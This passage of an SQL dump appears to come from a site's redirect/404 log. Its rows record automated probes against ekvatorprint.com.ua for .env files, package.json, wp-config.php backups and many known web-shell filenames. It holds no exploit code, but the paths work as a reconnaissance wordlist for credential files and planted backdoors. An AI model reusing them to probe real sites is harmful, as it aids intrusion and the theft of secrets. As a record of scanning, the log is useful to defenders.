00:00:00',301),(16118,'https://ekvatorprint.com.ua/ldskflks',NULL,'http://ekvatorprint.com.ua//ldskflks','',1,0,'2020-03-04 13:36:54','0000-00-00 00:00:00',301),(16119,'http://ekvatorprint.com.ua/wp-admin/css/ie.css',NULL,'http://www.google.com/','',3,0,'2020-03-05 03:20:26','0000-00-00 00:00:00',301),(16120,'https://ekvatorprint.com.ua/vod_installer/package.json',NULL,'','',1,0,'2020-03-05 03:51:30','0000-00-00 00:00:00',301),(16121,'https://ekvatorprint.com.ua/login/package.json',NULL,'','',1,0,'2020-03-05 03:51:30','0000-00-00 00:00:00',301),(16122,'https://ekvatorprint.com.ua/apps/package.json',NULL,'','',1,0,'2020-03-05 03:51:30','0000-00-00 00:00:00',301),(16123,'https://ekvatorprint.com.ua/docker/package.json',NULL,'','',1,0,'2020-03-05 03:51:30','0000-00-00 00:00:00',301),(16124,'https://ekvatorprint.com.ua/engine/package.json',NULL,'','',1,0,'2020-03-05 03:51:30','0000-00-00 00:00:00',301),(16125,'https://ekvatorprint.com.ua/package.json',NULL,'','',1,0,'2020-03-05 03:51:31','0000-00-00 00:00:00',301),(16126,'https://ekvatorprint.com.ua/vue/package.json',NULL,'','',1,0,'2020-03-05 03:51:31','0000-00-00 00:00:00',301),(16127,'https://ekvatorprint.com.ua/development/package.json',NULL,'','',1,0,'2020-03-05 03:51:31','0000-00-00 00:00:00',301),(16128,'https://ekvatorprint.com.ua/system/package.json',NULL,'','',1,0,'2020-03-05 03:51:31','0000-00-00 00:00:00',301),(16129,'https://ekvatorprint.com.ua/admin/package.json',NULL,'','',1,0,'2020-03-05 03:51:31','0000-00-00 00:00:00',301),(16130,'https://ekvatorprint.com.ua/deployment/package.json',NULL,'','',1,0,'2020-03-05 03:51:32','0000-00-00 00:00:00',301),(16131,'https://ekvatorprint.com.ua/app/package.json',NULL,'','',1,0,'2020-03-05 03:51:32','0000-00-00 00:00:00',301),(16132,'https://ekvatorprint.com.ua/backend/package.json',NULL,'','',1,0,'2020-03-05 03:51:32','0000-00-00 00:00:00',301),(16133,'https://ekvatorprint.com.ua/dependencies/package.json',NULL,'','',1,0,'2020-03-05 03:51:32','0000-00-00 00:00:00',301),(16134,'https://ekvatorprint.com.ua/laravel/package.json',NULL,'','',1,0,'2020-03-05 03:51:32','0000-00-00 00:00:00',301),(16135,'https://ekvatorprint.com.ua/auth/package.json',NULL,'','',1,0,'2020-03-05 03:51:32','0000-00-00 00:00:00',301),(16136,'https://ekvatorprint.com.ua/personal/package.json',NULL,'','',1,0,'2020-03-05 03:51:33','0000-00-00 00:00:00',301),(16137,'https://ekvatorprint.com.ua/cp/package.json',NULL,'','',1,0,'2020-03-05 03:51:33','0000-00-00 00:00:00',301),(16138,'https://ekvatorprint.com.ua/framework/package.json',NULL,'','',1,0,'2020-03-05 03:51:33','0000-00-00 00:00:00',301),(16139,'https://ekvatorprint.com.ua/shared/package.json',NULL,'','',1,0,'2020-03-05 03:51:33','0000-00-00 00:00:00',301),(16140,'https://ekvatorprint.com.ua/server/package.json',NULL,'','',1,0,'2020-03-05 03:51:33','0000-00-00 00:00:00',301),(16141,'https://ekvatorprint.com.ua/local/package.json',NULL,'','',1,0,'2020-03-05 03:51:33','0000-00-00 00:00:00',301),(16142,'https://ekvatorprint.com.ua/private/package.json',NULL,'','',1,0,'2020-03-05 03:51:34','0000-00-00 00:00:00',301),(16143,'https://ekvatorprint.com.ua/web/package.json',NULL,'','',1,0,'2020-03-05 03:51:34','0000-00-00 00:00:00',301),(16144,'https://ekvatorprint.com.ua/search/package.json',NULL,'','',1,0,'2020-03-05 03:51:34','0000-00-00 00:00:00',301),(16145,'https://ekvatorprint.com.ua/document/package.json',NULL,'','',1,0,'2020-03-05 03:51:34','0000-00-00 00:00:00',301),(16146,'https://ekvatorprint.com.ua/src/package.json',NULL,'','',1,0,'2020-03-05 03:51:34','0000-00-00 00:00:00',301),(16147,'https://ekvatorprint.com.ua/master/package.json',NULL,'','',1,0,'2020-03-05 03:51:35','0000-00-00 00:00:00',301),(16148,'https://ekvatorprint.com.ua/application/package.json',NULL,'','',1,0,'2020-03-05 03:51:35','0000-00-00 00:00:00',301),(16149,'https://ekvatorprint.com.ua/frontend/package.json',NULL,'','',1,0,'2020-03-05 03:51:35','0000-00-00 00:00:00',301),(16150,'https://ekvatorprint.com.ua/project/package.json',NULL,'','',1,0,'2020-03-05 03:51:35','0000-00-00 00:00:00',301),(16151,'https://ekvatorprint.com.ua/rest/package.json',NULL,'','',1,0,'2020-03-05 03:51:35','0000-00-00 00:00:00',301),(16152,'https://ekvatorprint.com.ua/protected/package.json',NULL,'','',1,0,'2020-03-05 03:51:35','0000-00-00 00:00:00',301),(16153,'https://ekvatorprint.com.ua/dev/package.json',NULL,'','',1,0,'2020-03-05 03:51:36','0000-00-00 00:00:00',301),(16154,'https://ekvatorprint.com.ua/site/package.json',NULL,'','',1,0,'2020-03-05 03:51:36','0000-00-00 00:00:00',301),(16155,'https://ekvatorprint.com.ua/back/package.json',NULL,'','',1,0,'2020-03-05 03:51:36','0000-00-00 00:00:00',301),(16156,'https://ekvatorprint.com.ua/api/package.json',NULL,'','',1,0,'2020-03-05 03:51:36','0000-00-00 00:00:00',301),(16157,'https://ekvatorprint.com.ua/laravel-artisan/package.json',NULL,'','',1,0,'2020-03-05 03:51:36','0000-00-00 00:00:00',301),(16158,'https://ekvatorprint.com.ua/config/package.json',NULL,'','',1,0,'2020-03-05 03:51:36','0000-00-00 00:00:00',301),(16159,'https://ekvatorprint.com.ua/cli/package.json',NULL,'','',1,0,'2020-03-05 03:51:37','0000-00-00 00:00:00',301),(16160,'https://ekvatorprint.com.ua/core/package.json',NULL,'','',1,0,'2020-03-05 03:51:37','0000-00-00 00:00:00',301),(16161,'https://ekvatorprint.com.ua/ceqhnwahkehhytefazrsrxq7',NULL,'','',1,0,'2020-03-05 09:59:01','0000-00-00 00:00:00',301),(16162,'https://ekvatorprint.com.ua/brandtalk/administrator/component/w6360n.php.php',NULL,'','',1,0,'2020-03-06 00:58:56','0000-00-00 00:00:00',301),(16163,'https://ekvatorprint.com.ua/brandtalk/administrator/component/w6360n.php',NULL,'','',1,0,'2020-03-06 02:28:57','0000-00-00 00:00:00',301),(16164,'http://ekvatorprint.com.ua/shop/license.txt',NULL,'http://ekvatorprint.com.ua/shop/license.txt','',1,0,'2020-03-08 15:46:16','0000-00-00 00:00:00',301),(16165,'http://ekvatorprint.com.ua/dev/license.txt',NULL,'http://ekvatorprint.com.ua/dev/license.txt','',2,0,'2020-03-10 01:29:54','0000-00-00 00:00:00',301),(16166,'http://ekvatorprint.com.ua/wordpress/license.txt',NULL,'','',3,0,'2020-03-12 02:18:13','0000-00-00 00:00:00',301),(16167,'https://ekvatorprint.com.ua/assets/',NULL,'','',1,0,'2020-03-12 02:55:41','0000-00-00 00:00:00',301),(16168,'https://ekvatorprint.com.ua/2018/',NULL,'','',30,0,'2020-03-12 02:55:42','0000-00-00 00:00:00',301),(16169,'https://ekvatorprint.com.ua/2019/',NULL,'','',30,0,'2020-03-12 02:55:42','0000-00-00 00:00:00',301),(16170,'https://ekvatorprint.com.ua/bk/',NULL,'','',30,0,'2020-03-12 02:55:43','0000-00-00 00:00:00',301),(16171,'https://ekvatorprint.com.ua/wp2/',NULL,'','',30,0,'2020-03-12 02:55:43','0000-00-00 00:00:00',301),(16172,'http://ekvatorprint.com.ua/old/license.txt',NULL,'http://ekvatorprint.com.ua/old/license.txt','',3,0,'2020-03-12 22:33:49','0000-00-00 00:00:00',301),(16173,'http://ekvatorprint.com.ua/new/license.txt',NULL,'http://ekvatorprint.com.ua/new/license.txt','',2,0,'2020-03-13 10:05:37','0000-00-00 00:00:00',301),(16174,'http://ekvatorprint.com.ua/cms/license.txt',NULL,'http://ekvatorprint.com.ua/cms/license.txt','',1,0,'2020-03-13 21:03:23','0000-00-00 00:00:00',301),(16175,'http://ekvatorprint.com.ua/w/license.txt',NULL,'http://ekvatorprint.com.ua/w/license.txt','',2,0,'2020-03-14 08:40:00','0000-00-00 00:00:00',301),(16176,'http://ekvatorprint.com.ua/2/license.txt',NULL,'http://ekvatorprint.com.ua/2/license.txt','',2,0,'2020-03-14 14:20:33','0000-00-00 00:00:00',301),(16177,'http://ekvatorprint.com.ua/tmp/license.txt',NULL,'http://ekvatorprint.com.ua/tmp/license.txt','',3,0,'2020-03-14 19:58:55','0000-00-00 00:00:00',301),(16178,'https://ekvatorprint.com.ua/vod_installer/.env',NULL,'','',1,0,'2020-03-14 23:58:13','0000-00-00 00:00:00',301),(16179,'https://ekvatorprint.com.ua/login/.env',NULL,'','',2,0,'2020-03-14 23:58:14','0000-00-00 00:00:00',301),(16180,'https://ekvatorprint.com.ua/apps/.env',NULL,'','',19,0,'2020-03-14 23:58:14','0000-00-00 00:00:00',301),(16181,'https://ekvatorprint.com.ua/docker/.env',NULL,'','',1,0,'2020-03-14 23:58:14','0000-00-00 00:00:00',301),(16182,'https://ekvatorprint.com.ua/engine/.env',NULL,'','',1,0,'2020-03-14 23:58:14','0000-00-00 00:00:00',301),(16183,'https://ekvatorprint.com.ua/vue/.env',NULL,'','',1,0,'2020-03-14 23:58:15','0000-00-00 00:00:00',301),(16184,'https://ekvatorprint.com.ua/development/.env',NULL,'','',5,0,'2020-03-14 23:58:15','0000-00-00 00:00:00',301),(16185,'https://ekvatorprint.com.ua/system/.env',NULL,'','',22,0,'2020-03-14 23:58:15','0000-00-00 00:00:00',301),(16186,'https://ekvatorprint.com.ua/admin/.env',NULL,'','',57,0,'2020-03-14 23:58:15','0000-00-00 00:00:00',301),(16187,'https://ekvatorprint.com.ua/deployment/.env',NULL,'','',1,0,'2020-03-14 23:58:16','0000-00-00 00:00:00',301),(16188,'https://ekvatorprint.com.ua/app/.env',NULL,'','',32,0,'2020-03-14 23:58:16','0000-00-00 00:00:00',301),(16189,'https://ekvatorprint.com.ua/backend/.env',NULL,'','',51,0,'2020-03-14 23:58:16','0000-00-00 00:00:00',301),(16190,'https://ekvatorprint.com.ua/dependencies/.env',NULL,'','',1,0,'2020-03-14 23:58:17','0000-00-00 00:00:00',301),(16191,'https://ekvatorprint.com.ua/laravel/.env',NULL,'','',89,0,'2020-03-14 23:58:17','0000-00-00 00:00:00',301),(16192,'https://ekvatorprint.com.ua/auth/.env',NULL,'','',1,0,'2020-03-14 23:58:17','0000-00-00 00:00:00',301),(16193,'https://ekvatorprint.com.ua/personal/.env',NULL,'','',1,0,'2020-03-14 23:58:17','0000-00-00 00:00:00',301),(16194,'https://ekvatorprint.com.ua/cp/.env',NULL,'','',1,0,'2020-03-14 23:58:17','0000-00-00 00:00:00',301),(16195,'https://ekvatorprint.com.ua/framework/.env',NULL,'','',1,0,'2020-03-14 23:58:18','0000-00-00 00:00:00',301),(16196,'https://ekvatorprint.com.ua/shared/.env',NULL,'','',1,0,'2020-03-14 23:58:18','0000-00-00 00:00:00',301),(16197,'https://ekvatorprint.com.ua/server/.env',NULL,'','',1,0,'2020-03-14 23:58:18','0000-00-00 00:00:00',301),(16198,'https://ekvatorprint.com.ua/local/.env',NULL,'','',51,0,'2020-03-14 23:58:18','0000-00-00 00:00:00',301),(16199,'https://ekvatorprint.com.ua/private/.env',NULL,'','',1,0,'2020-03-14 23:58:19','0000-00-00 00:00:00',301),(16200,'https://ekvatorprint.com.ua/web/.env',NULL,'','',2,0,'2020-03-14 23:58:19','0000-00-00 00:00:00',301),(16201,'https://ekvatorprint.com.ua/search/.env',NULL,'','',1,0,'2020-03-14 23:58:19','0000-00-00 00:00:00',301),(16202,'https://ekvatorprint.com.ua/document/.env',NULL,'','',1,0,'2020-03-14 23:58:19','0000-00-00 00:00:00',301),(16203,'https://ekvatorprint.com.ua/src/.env',NULL,'','',17,0,'2020-03-14 23:58:20','0000-00-00 00:00:00',301),(16204,'https://ekvatorprint.com.ua/master/.env',NULL,'','',1,0,'2020-03-14 23:58:20','0000-00-00 00:00:00',301),(16205,'https://ekvatorprint.com.ua/application/.env',NULL,'','',21,0,'2020-03-14 23:58:20','0000-00-00 00:00:00',301),(16206,'https://ekvatorprint.com.ua/frontend/.env',NULL,'','',1,0,'2020-03-14 23:58:20','0000-00-00 00:00:00',301),(16207,'https://ekvatorprint.com.ua/project/.env',NULL,'','',1,0,'2020-03-14 23:58:21','0000-00-00 00:00:00',301),(16208,'https://ekvatorprint.com.ua/rest/.env',NULL,'','',1,0,'2020-03-14 23:58:21','0000-00-00 00:00:00',301),(16209,'https://ekvatorprint.com.ua/protected/.env',NULL,'','',49,0,'2020-03-14 23:58:21','0000-00-00 00:00:00',301),(16210,'https://ekvatorprint.com.ua/dev/.env',NULL,'','',5,0,'2020-03-14 23:58:21','0000-00-00 00:00:00',301),(16211,'https://ekvatorprint.com.ua/site/.env',NULL,'','',2,0,'2020-03-14 23:58:21','0000-00-00 00:00:00',301),(16212,'https://ekvatorprint.com.ua/back/.env',NULL,'','',1,0,'2020-03-14 23:58:22','0000-00-00 00:00:00',301),(16213,'https://ekvatorprint.com.ua/api/.env',NULL,'','',55,0,'2020-03-14 23:58:22','0000-00-00 00:00:00',301),(16214,'https://ekvatorprint.com.ua/laravel-artisan/.env',NULL,'','',1,0,'2020-03-14 23:58:22','0000-00-00 00:00:00',301),(16215,'https://ekvatorprint.com.ua/config/.env',NULL,'','',4,0,'2020-03-14 23:58:22','0000-00-00 00:00:00',301),(16216,'https://ekvatorprint.com.ua/cli/.env',NULL,'','',1,0,'2020-03-14 23:58:23','0000-00-00 00:00:00',301),(16217,'https://ekvatorprint.com.ua/core/.env',NULL,'','',36,0,'2020-03-14 23:58:23','0000-00-00 00:00:00',301),(16218,'http://ekvatorprint.com.ua/joomla/web.config.txt',NULL,'http://ekvatorprint.com.ua/joomla/web.config.txt','',1,0,'2020-03-15 22:39:26','0000-00-00 00:00:00',301),(16219,'https://ekvatorprint.com.ua/blog/wp-admin/setup-config.php',NULL,'','',3,0,'2020-03-16 10:44:18','0000-00-00 00:00:00',301),(16220,'https://ekvatorprint.com.ua/site/wp-admin/setup-config.php',NULL,'','',1,0,'2020-03-16 10:44:18','0000-00-00 00:00:00',301),(16221,'https://ekvatorprint.com.ua/url',NULL,'https://ekvatorprint.com.ua/','',1,0,'2020-03-17 20:58:33','0000-00-00 00:00:00',301),(16222,'https://ekvatorprint.com.ua/backup.php',NULL,'http://site.ru','',5,0,'2020-03-21 07:53:27','0000-00-00 00:00:00',301),(16223,'https://ekvatorprint.com.ua/wp-crons.php',NULL,'http://site.ru','',7,0,'2020-03-21 18:42:07','0000-00-00 00:00:00',301),(16224,'https://ekvatorprint.com.ua/lfm.php',NULL,'http://site.ru','',6,0,'2020-03-21 19:29:51','0000-00-00 00:00:00',301),(16225,'https://ekvatorprint.com.ua/alfa.php',NULL,'http://site.ru','',57,0,'2020-03-21 23:07:36','0000-00-00 00:00:00',301),(16226,'https://ekvatorprint.com.ua/wp-site.php',NULL,'http://site.ru','',4,0,'2020-03-21 23:41:57','0000-00-00 00:00:00',301),(16227,'https://ekvatorprint.com.ua/hours.php',NULL,'http://site.ru','',11,0,'2020-03-22 01:15:22','0000-00-00 00:00:00',301),(16228,'https://ekvatorprint.com.ua/wp-config.php.1',NULL,'ekvatorprint.com.ua','',9,0,'2020-03-22 11:22:04','0000-00-00 00:00:00',301),(16229,'https://ekvatorprint.com.ua/wp-config.php.swp',NULL,'ekvatorprint.com.ua','',8,0,'2020-03-22 11:22:17','0000-00-00 00:00:00',301),(16230,'https://ekvatorprint.com.ua/wp-config.php.disabled',NULL,'ekvatorprint.com.ua','',7,0,'2020-03-22 11:22:20','0000-00-00 00:00:00',301),(16231,'https://ekvatorprint.com.ua/wp-config.php_orig',NULL,'ekvatorprint.com.ua','',7,0,'2020-03-22 11:23:47','0000-00-00 00:00:00',301),(16232,'https://ekvatorprint.com.ua/r.php',NULL,'http://site.ru','',12,0,'2020-03-22 11:31:53','0000-00-00 00:00:00',301),(16233,'https://ekvatorprint.com.ua/wp-m.php',NULL,'http://site.ru','',7,0,'2020-03-22 13:52:15','0000-00-00 00:00:00',301),(16234,'https://ekvatorprint.com.ua/blackhat.php.suspected',NULL,'http://site.ru','',16,0,'2020-03-22 15:10:33','0000-00-00 00:00:00',301),(16235,'https://ekvatorprint.com.ua/scriptsa/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-03-22 17:37:27','0000-00-00 00:00:00',301),(16236,'https://ekvatorprint.com.ua/shx.php',NULL,'http://site.ru','',14,0,'2020-03-22 17:38:34','0000-00-00 00:00:00',301),(16237,'https://ekvatorprint.com.ua/user.ini.php',NULL,'http://site.ru','',1,0,'2020-03-22 18:30:52','0000-00-00 00:00:00',301),(16238,'https://ekvatorprint.com.ua/freshrdp.com.php',NULL,'http://site.ru','',1,0,'2020-03-22 18:39:11','0000-00-00 00:00:00',301),(16239,'https://ekvatorprint.com.ua/xmlrpc/logo_img.php.suspected',NULL,'http://site.ru','',4,0,'2020-03-22 20:22:34','0000-00-00 00:00:00',301),(16240,'https://ekvatorprint.com.ua/dontme.php',NULL,'http://site.ru','',6,0,'2020-03-22 20:23:39','0000-00-00 00:00:00',301),(16241,'https://ekvatorprint.com.ua/libraries/joomla/template/tools.php',NULL,'http://site.ru','',5,0,'2020-03-22 22:07:16','0000-00-00 00:00:00',301),(16242,'https://ekvatorprint.com.ua/w.php',NULL,'http://site.ru','',11,0,'2020-03-22 23:16:29','0000-00-00 00:00:00',301),(16243,'https://ekvatorprint.com.ua/wp-linfo.php',NULL,'http://site.ru','',4,0,'2020-03-22 23:32:52','0000-00-00 00:00:00',301),(16244,'https://ekvatorprint.com.ua/weblinks.php',NULL,'http://site.ru','',9,0,'2020-03-23 02:57:59','0000-00-00 00:00:00',301),(16245,'https://ekvatorprint.com.ua/x94k.php',NULL,'','',1,0,'2020-03-23 04:54:02','0000-00-00 00:00:00',301),(16246,'https://ekvatorprint.com.ua/scripts/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-03-23 06:38:50','0000-00-00 00:00:00',301),(16247,'https://ekvatorprint.com.ua/c.php',NULL,'http://site.ru','',21,0,'2020-03-23 07:18:55','0000-00-00 00:00:00',301),(16248,'https://ekvatorprint.com.ua/s.php',NULL,'http://site.ru','',12,0,'2020-03-23 10:13:25','0000-00-00 00:00:00',301),(16249,'https://ekvatorprint.com.ua/printing-on-vinylюжбчюдддддддц',NULL,'','',1,0,'2020-03-23 11:58:41','0000-00-00 00:00:00',301),(16250,'https://ekvatorprint.com.ua/uploads.php',NULL,'http://site.ru','',3,0,'2020-03-23 13:08:52','0000-00-00 00:00:00',301),(16251,'https://ekvatorprint.com.ua/xmlrpc/header_img.php.suspected',NULL,'http://site.ru','',2,0,'2020-03-23 13:20:17','0000-00-00 00:00:00',301),(16252,'https://ekvatorprint.com.ua/calculus/popup-pomo.php',NULL,'http://site.ru','',7,0,'2020-03-23 14:59:34','0000-00-00 00:00:00',301),(16253,'https://ekvatorprint.com.ua/bubus.php',NULL,'http://site.ru','',4,0,'2020-03-23 16:13:16','0000-00-00 00:00:00',301),(16254,'https://ekvatorprint.com.ua/fghhgfs.php',NULL,'http://site.ru','',4,0,'2020-03-23 16:17:57','0000-00-00 00:00:00',301),(16255,'https://ekvatorprint.com.ua/optionsa/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-03-23 16:24:13','0000-00-00 00:00:00',301),(16256,'https://ekvatorprint.com.ua/backup/ocp.php',NULL,'http://site.ru','',5,0,'2020-03-23 16:48:05','0000-00-00 00:00:00',301),(16257,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/toor.php',NULL,'http://site.ru','',3,0,'2020-03-23 17:09:18','0000-00-00 00:00:00',301),(16258,'https://ekvatorprint.com.ua/libraries/joomla/base/content-ubh.php',NULL,'http://site.ru','',5,0,'2020-03-23 17:19:27','0000-00-00 00:00:00',301),(16259,'https://ekvatorprint.com.ua/anon.php',NULL,'http://site.ru','',6,0,'2020-03-23 17:35:52','0000-00-00 00:00:00',301),(16260,'https://ekvatorprint.com.ua/mhbgf.php.suspected',NULL,'http://site.ru','',2,0,'2020-03-23 18:03:28','0000-00-00 00:00:00',301),(16261,'https://ekvatorprint.com.ua/cwyiog.php',NULL,'http://site.ru','',3,0,'2020-03-23 19:01:36','0000-00-00 00:00:00',301),(16262,'https://ekvatorprint.com.ua/cache/accesson1.php',NULL,'https://ekvatorprint.com.ua/index.php/component/users/?view=login','',9,0,'2020-03-23 19:52:47','0000-00-00 00:00:00',301),(16263,'https://ekvatorprint.com.ua/wp-blog.php',NULL,'http://site.ru','',12,0,'2020-03-23 20:00:12','0000-00-00 00:00:00',301),(16264,'https://ekvatorprint.com.ua/codules.php',NULL,'','',3,0,'2020-03-23 21:55:06','0000-00-00 00:00:00',301),(16265,'https://ekvatorprint.com.ua/dsfghs.php',NULL,'http://site.ru','',6,0,'2020-03-23 22:17:22','0000-00-00 00:00:00',301),(16266,'https://ekvatorprint.com.ua/wp-inc.php.suspected',NULL,'http://site.ru','',3,0,'2020-03-23 23:26:44','0000-00-00 00:00:00',301),(16267,'https://ekvatorprint.com.ua/jvel/mini-shell-deface.php',NULL,'http://site.ru','',4,0,'2020-03-23 23:43:55','0000-00-00 00:00:00',301),(16268,'https://ekvatorprint.com.ua/penguin/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-03-23 23:45:39','0000-00-00 00:00:00',301),(16269,'https://ekvatorprint.com.ua/components/com_ajax/ajax.lib.php',NULL,'http://site.ru','',6,0,'2020-03-24 00:35:54','0000-00-00 00:00:00',301),(16270,'https://ekvatorprint.com.ua/themes/popup-pomo.php',NULL,'http://site.ru','',4,0,'2020-03-24 00:36:39','0000-00-00 00:00:00',301),(16271,'https://ekvatorprint.com.ua/ws0.php',NULL,'http://site.ru','',1,0,'2020-03-24 02:14:28','0000-00-00 00:00:00',301),(16272,'https://ekvatorprint.com.ua/wp-mini.php',NULL,'http://site.ru','',1,0,'2020-03-24 02:33:55','0000-00-00 00:00:00',301),(16273,'https://ekvatorprint.com.ua/media.php',NULL,'http://site.ru','',7,0,'2020-03-24 03:04:55','0000-00-00 00:00:00',301),(16274,'https://ekvatorprint.com.ua/index8632.php',NULL,'http://site.ru','',3,0,'2020-03-24 06:59:44','0000-00-00 00:00:00',301),(16275,'https://ekvatorprint.com.ua/emigrate/popup-pomo.php',NULL,'http://site.ru','',5,0,'2020-03-24 07:18:13','0000-00-00 00:00:00',301),(16276,'https://ekvatorprint.com.ua/df.php',NULL,'http://site.ru','',3,0,'2020-03-24 07:55:47','0000-00-00 00:00:00',301),(16277,'https://ekvatorprint.com.ua/mod.php',NULL,'http://site.ru','',3,0,'2020-03-24 08:08:57','0000-00-00 00:00:00',301),(16278,'https://ekvatorprint.com.ua/modules/logo_img.php',NULL,'http://site.ru','',5,0,'2020-03-24 09:26:55','0000-00-00 00:00:00',301),(16279,'https://ekvatorprint.com.ua/wolf.php',NULL,'http://site.ru','',4,0,'2020-03-24 10:37:27','0000-00-00 00:00:00',301),(16280,'https://ekvatorprint.com.ua/tt.php',NULL,'http://site.ru','',4,0,'2020-03-24 10:40:18','0000-00-00 00:00:00',301),(16281,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/help.php',NULL,'http://site.ru','',2,0,'2020-03-24 11:06:43','0000-00-00 00:00:00',301),(16282,'https://ekvatorprint.com.ua/css_.php',NULL,'http://site.ru','',2,0,'2020-03-24 11:20:10','0000-00-00 00:00:00',301),(16283,'https://ekvatorprint.com.ua/cache/logo_img.php.suspected',NULL,'http://site.ru','',4,0,'2020-03-24 16:05:42','0000-00-00 00:00:00',301),(16284,'https://ekvatorprint.com.ua/sizings.php',NULL,'http://site.ru','',4,0,'2020-03-24 17:49:59','0000-00-00 00:00:00',301),(16285,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.4/marvins.php',NULL,'http://site.ru','',2,0,'2020-03-24 20:31:32','0000-00-00 00:00:00',301),(16286,'https://ekvatorprint.com.ua/components/com_contact/index.php',NULL,'http://site.ru','',5,0,'2020-03-24 21:16:35','0000-00-00 00:00:00',301),(16287,'https://ekvatorprint.com.ua/old/wp-page.php',NULL,'http://site.ru','',4,0,'2020-03-24 21:44:48','0000-00-00 00:00:00',301),(16288,'https://ekvatorprint.com.ua/cool.php',NULL,'http://site.ru','',5,0,'2020-03-24 22:03:29','0000-00-00 00:00:00',301),(16289,'https://ekvatorprint.com.ua/data.php',NULL,'http://site.ru','',12,0,'2020-03-24 22:07:54','0000-00-00 00:00:00',301),(16290,'https://ekvatorprint.com.ua/includes.php',NULL,'http://site.ru','',6,0,'2020-03-24 23:58:06','0000-00-00 00:00:00',301),(16291,'https://ekvatorprint.com.ua/wp-api.php',NULL,'http://site.ru','',5,0,'2020-03-25 00:37:13','0000-00-00 00:00:00',301),(16292,'https://ekvatorprint.com.ua/wp-meta.php',NULL,'http://site.ru','',3,0,'2020-03-25 02:39:54','0000-00-00 00:00:00',301),(16293,'https://ekvatorprint.com.ua/.ftp.php',NULL,'http://site.ru','',5,0,'2020-03-25 04:52:10','0000-00-00 00:00:00',301),(16294,'https://ekvatorprint.com.ua/m1.php',NULL,'http://site.ru','',5,0,'2020-03-25 06:16:05','0000-00-00 00:00:00',301),(16295,'https://ekvatorprint.com.ua/wp-theme.php',NULL,'http://site.ru','',3,0,'2020-03-25 06:59:44','0000-00-00 00:00:00',301),(16296,'https://ekvatorprint.com.ua/components/com_content/green.php',NULL,'http://site.ru','',6,0,'2020-03-25 08:01:19','0000-00-00 00:00:00',301),(16297,'https://ekvatorprint.com.ua/therm.php',NULL,'http://site.ru','',3,0,'2020-03-25 08:59:53','0000-00-00 00:00:00',301),(16298,'https://ekvatorprint.com.ua/anymore/popup-pomo.php',NULL,'http://site.ru','',6,0,'2020-03-25 09:56:45','0000-00-00 00:00:00',301),(16299,'https://ekvatorprint.com.ua/options.php',NULL,'http://site.ru','',9,0,'2020-03-25 10:02:02','0000-00-00 00:00:00',301),(16300,'http://ekvatorprint.com.ua/site/license.txt',NULL,'http://ekvatorprint.com.ua/site/license.txt','',2,0,'2020-03-25 11:10:38','0000-00-00 00:00:00',301),(16301,'https://ekvatorprint.com.ua/old/mhbgf.php',NULL,'http://site.ru','',2,0,'2020-03-25 11:21:23','0000-00-00 00:00:00',301),(16302,'https://ekvatorprint.com.ua/wolfis.php',NULL,'http://site.ru','',1,0,'2020-03-25 11:55:10','0000-00-00 00:00:00',301),(16303,'https://ekvatorprint.com.ua/0g4/mini-shell-backdoor-download.php',NULL,'http://site.ru','',4,0,'2020-03-25 12:16:40','0000-00-00 00:00:00',301),(16304,'https://ekvatorprint.com.ua/cache/newsleter.php.suspected',NULL,'http://site.ru','',3,0,'2020-03-25 12:17:57','0000-00-00 00:00:00',301),(16305,'https://ekvatorprint.com.ua/home.php',NULL,'http://site.ru','',14,0,'2020-03-25 12:25:42','0000-00-00 00:00:00',301),(16306,'https://ekvatorprint.com.ua/lib.php',NULL,'http://site.ru','',6,0,'2020-03-25 13:14:14','0000-00-00 00:00:00',301),(16307,'https://ekvatorprint.com.ua/cache/logo_img.php',NULL,'http://site.ru','',4,0,'2020-03-25 15:45:22','0000-00-00 00:00:00',301),(16308,'https://ekvatorprint.com.ua/templates/system/images/green.php',NULL,'http://site.ru','',4,0,'2020-03-25 16:52:35','0000-00-00 00:00:00',301),(16309,'https://ekvatorprint.com.ua/camilles.php',NULL,'http://site.ru','',8,0,'2020-03-25 17:17:20','0000-00-00 00:00:00',301),(16310,'https://ekvatorprint.com.ua/themesa/popup-pomo.php',NULL,'http://site.ru','',5,0,'2020-03-25 17:23:48','0000-00-00 00:00:00',301),(16311,'https://ekvatorprint.com.ua/c7.php',NULL,'http://site.ru','',3,0,'2020-03-25 18:14:14','0000-00-00 00:00:00',301),(16312,'http://ekvatorprint.com.ua/temp/license.txt',NULL,'http://ekvatorprint.com.ua/temp/license.txt','',1,0,'2020-03-25 18:15:23','0000-00-00 00:00:00',301),(16313,'https://ekvatorprint.com.ua/so.php',NULL,'http://site.ru','',5,0,'2020-03-25 19:08:15','0000-00-00 00:00:00',301),(16314,'https://ekvatorprint.com.ua/sipp/img.php',NULL,'http://site.ru','',1,0,'2020-03-25 19:17:15','0000-00-00 00:00:00',301),(16315,'https://ekvatorprint.com.ua/backup/mobile.php',NULL,'http://site.ru','',4,0,'2020-03-25 20:18:02','0000-00-00 00:00:00',301),(16316,'https://ekvatorprint.com.ua/htaccess.php.suspected',NULL,'http://site.ru','',2,0,'2020-03-25 20:39:04','0000-00-00 00:00:00',301),(16317,'https://ekvatorprint.com.ua/ajax-requests.new.php',NULL,'http://site.ru','',3,0,'2020-03-25 20:51:09','0000-00-00 00:00:00',301),(16318,'https://ekvatorprint.com.ua/gg.php',NULL,'http://site.ru','',3,0,'2020-03-25 21:01:41','0000-00-00 00:00:00',301),(16319,'https://ekvatorprint.com.ua/cache/cache.php',NULL,'http://site.ru','',2,0,'2020-03-25 21:40:45','0000-00-00 00:00:00',301),(16320,'https://ekvatorprint.com.ua/6y8rwmg/mini-shell-uploader.php',NULL,'http://site.ru','',3,0,'2020-03-25 22:09:01','0000-00-00 00:00:00',301),(16321,'https://ekvatorprint.com.ua/modules/mod.php',NULL,'http://site.ru','',5,0,'2020-03-25 22:25:04','0000-00-00 00:00:00',301),(16322,'http://ekvatorprint.com.ua/web/license.txt',NULL,'http://ekvatorprint.com.ua/web/license.txt','',1,0,'2020-03-25 23:58:14','0000-00-00 00:00:00',301),(16323,'https://ekvatorprint.com.ua/newsfeter.php.suspected',NULL,'http://site.ru','',3,0,'2020-03-26 00:12:53','0000-00-00 